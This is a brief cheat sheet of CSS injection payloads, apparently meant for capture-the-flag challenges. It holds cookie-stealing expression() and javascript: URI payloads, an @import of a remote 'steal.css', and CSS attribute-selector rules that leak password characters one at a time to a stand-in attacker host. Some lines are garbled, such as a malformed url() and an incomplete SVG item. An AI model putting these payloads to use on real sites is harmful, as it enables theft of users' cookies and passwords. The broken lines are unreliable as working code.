/* 1. expression() – works on very old IE only (rare now) */
expression(alert(document.cookie))

/* 2. @import – loads external CSS (MOST COMMON IN CTFs) */
@import "https://your-server.com/steal.css";

/* 3. javascript: URI (works in some old WebKit) */
background: url(javascript:alert(document.cookie));

/* 4. SVG + XSS (if they allow .svg upload as "CSS theme") */
alert(XSS)

/* 5. CSS keylogging / exfil (super reliable in modern CTFs) */
input[type=password][value$="a"] { background: ur[](https://attacker.com/log?a); }
input[type=password][value$="b"] { background: ur[](https://attacker.com/log?b); }
/* …repeat for 0-9, a-z → brute-forces passwords or tokens */